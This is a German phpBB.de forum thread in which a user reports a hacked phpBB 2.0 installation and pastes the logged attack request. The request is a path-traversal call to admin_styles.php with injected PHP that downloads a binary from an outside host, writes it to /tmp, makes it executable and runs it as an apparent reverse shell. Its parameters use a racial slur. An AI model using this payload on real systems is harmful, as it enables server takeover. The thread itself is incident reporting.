phpbb gehackt - Styles überschrieben

Eine Neuinstallation von phpBB 2.0 wird auf phpBB.de nicht mehr unterstützt.
Siehe auch Entwicklungs-Ende von phpBB 2.0 - Auswirkungen auf phpBB.de
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.

Eine Neuinstallation von phpBB 2.0 wird auf phpBB.de nicht mehr unterstützt.
Siehe auch Entwicklungs-Ende von phpBB 2.0 - Auswirkungen auf phpBB.de
Gesperrt
chris478
Mitglied
Beiträge: 189
Registriert: 22.11.2002 18:13
Wohnort: Sulzbach-Rosenberg
Kontaktdaten:

phpbb gehackt - Styles überschrieben

Beitrag von chris478 »

Hiho,
mir hat jemand die Styles überschrieben. Gibts da irgendein Sicherheitsupdate das ich verpennt hab?
Angriffscode hat glaub ich etwa so ausgesehen:

Code: Alles auswählen

Script: /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=e4450f5874ea67ac64d1988c972dbf34&niggaip=82.57.74.92&niggaport=65000&nigga=$a=fopen("http://www.apaw.ca/images/nc4hk.swf","r");$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777);passthru("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20");
Gruss
---chris
GrisuXX
Mitglied
Beiträge: 69
Registriert: 28.09.2004 13:17
Wohnort: Norderstedt
Kontaktdaten:

Beitrag von GrisuXX »

Suche hier im Forum nach dem Wort „nigga“ und dir ist geholfen!


:wink:
MFG

Rainer
Gesperrt

Zurück zu „phpBB 2.0: Installation und Update“